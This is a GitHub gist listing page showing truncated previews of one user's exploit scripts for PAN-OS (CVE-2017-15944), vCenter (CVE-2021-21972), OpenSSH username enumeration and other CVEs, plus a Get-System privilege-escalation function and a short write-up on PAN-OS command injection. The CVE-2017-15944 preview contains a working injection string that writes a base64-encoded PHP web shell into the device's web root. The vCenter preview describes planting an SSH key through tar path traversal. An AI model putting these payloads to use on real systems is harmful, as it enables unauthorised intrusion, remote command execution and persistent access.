@milo2012
milo2012 / sendKeys.go
Created January 27, 2023 19:54
sendKeys.go
package main
import (
//"flag"
"log"
"fmt"
"strings"
"time"
"github.com/stephen-fox/user32util"
)
var timeout time.Duration = 1
@milo2012
milo2012 / CVE-2020-25780.py
Created February 8, 2022 06:11
CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64
def fixed_xml_body_as_string(filename):
text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
text+=' <soapenv:Header/>'
text+=' <soapenv:Body>'
@milo2012
milo2012 / CVE-2017-15944_1.py
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post
@milo2012
milo2012 / CVE-2017-15944_2.py
Last active July 19, 2021 14:26
CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):
@milo2012
milo2012 / CVE-2017-15944.md
Last active June 22, 2023 08:07
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques for exploiting CVE-2017-15944 is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

@milo2012
milo2012 / searchKaliPkg.py
Last active May 17, 2021 04:11
Search Kali Repo (http.kali.org)
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
def getHTML(url):
@milo2012
milo2012 / Get-System.ps1
Last active November 22, 2021 18:50
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
@milo2012
milo2012 / CVE-2010-4180.py
Last active May 25, 2022 12:03
CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
@milo2012
milo2012 / CVE-2021-21972.py
Last active February 26, 2021 09:01
CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''
@milo2012
milo2012 / CVE-2018-15473.py
Created June 1, 2020 17:15
SSH Username Enumeration (CVE-2018-15473) - Supports IPv6
# Exploit: OpenSSH 7.7 - Username Enumeration
# Author: Justin Gardner
# Date: 2018-08-20
# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
# Affected Versions: OpenSSH version < 7.7
# CVE: CVE-2018-15473
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____| | | | #